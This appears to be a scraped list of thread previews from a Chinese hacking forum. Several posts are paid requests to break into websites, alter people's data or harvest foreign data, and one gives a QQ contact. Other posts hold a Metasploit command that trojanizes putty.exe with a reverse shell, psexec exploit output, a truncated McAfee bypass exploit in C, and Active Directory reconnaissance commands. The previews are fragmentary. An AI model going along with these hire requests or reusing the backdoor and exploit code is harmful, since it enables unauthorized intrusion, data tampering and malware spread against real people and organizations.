-
-
0111111111111
-
0
-
19
-
16重金求帮忙渗透一个网站改个人的一些数据,具体细聊,私聊下详谈,能解决报酬好商量
-
0
-
1求技术大神,先帮后付,成功绝不会亏待,有意向者加qq577590074,先帮后付!先帮后付!你们自己懂得!
-
2本人已专注于网络安全行业多年,吧内一切行为与本人无关
-
0被骗好几次了,真心想找一个,正正有技术的,别上来就这个那个一顿忽悠要钱,我发现了,上来就提钱都是骗子,如果真有实力,价格好说,合作也可以,
-
3寻外网渗透,只要成功日赚万元,真心合作实力大神来,小弟弟们麻烦绕道!
-
3只要真实,慢慢给你想要的
-
5
-
10🍊心寻一渗透大佬,
-
2有主要做国外数据的吗?最好是团队,我需求量大,长期合作,报酬可谈,(如果你不做,你认识的有人做也可以给我引荐一下)诚心,私聊。
-
13学校的信息泄露漏洞太垃圾了
-
11实际做过软件项目不?多少年? 我是在一个小公司做C和obj-C两年了,偶尔也用C++。是不是学习web安全需要有实际写过web项目的经验?比如说编写过论坛什
-
3
-
24祭天
-
8听说你们谁买了 ACR122U,分享点数据大家一起分析一下呗。手头没钱啊。。。
-
24在下是渗透控,正在学习渗透,如果有愿意交流的朋友,请联系我
-
16我想学渗透,请问谁可以做我师傅?
-
4
-
4
-
51
-
11本人以前就实验过 可是一直失败 前几天看了笔墨转载的文章 今天又试了一下 为啥还是失败呢? 用虚拟机测试的 msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.1.11:4444 [*] Connecting to the server... [*] Authenticating to 192.168.1.4:445|WORKGROUP as user 'a'... [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) 难道是目标主机的SMB服务关了? 防火墙神马的 都木开啊 以本机win7为目标 msf explo
-
3msfpayload /windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/example_01/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5
-
0
-
0
-
8当初他可是很6的,进入到发电站内部监控网络,发了一张监控图,我还记得哦
-
29WooYun里面的白帽子经常用到XSS工具和修改网页POST工具,都没有见过。。。。想知道他们都用什么工具,有人能列一个表吗?
-
3
-
0
-
0新人,小白一个,用手机的zanti,有没有大神教我点别的
-
14求一个断室友网络的教程
-
0McAfee VirusScan企业版8.8安全限制绕过漏洞 2016年3月8号出的洞,还是比较新的 [mw_shl_code=c,true] #include <stdio.h> #include <windows.h> HANDLE opendevice() { HANDLE result; if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLA
-
1
-
4关于域命令的东西,为方便大家,整理一份,希望给大家带来一些帮助!~ 查询域管理员用户:net group “domain admins” /domain 查询域用户:net user /domain 查询域名称:net view /domain 查询域内计算机:net view /domain:XX 查询域控制器:net time /domain 查询所有域控制器:dsquery server 例:dsquery server -domain super.com | dsget server -dnsname -site (搜索域内所有域控制器并显示他们的DNS主机名和站点名称) 查询域内计算机:dsquery computer 例:dsquery computer domainroot -name admin* -limit
-
9刚接触wvs,还不太理解,上面大概就是提示是基于时间的盲注,下面有一些post 的数据,这个应该怎么利用啊?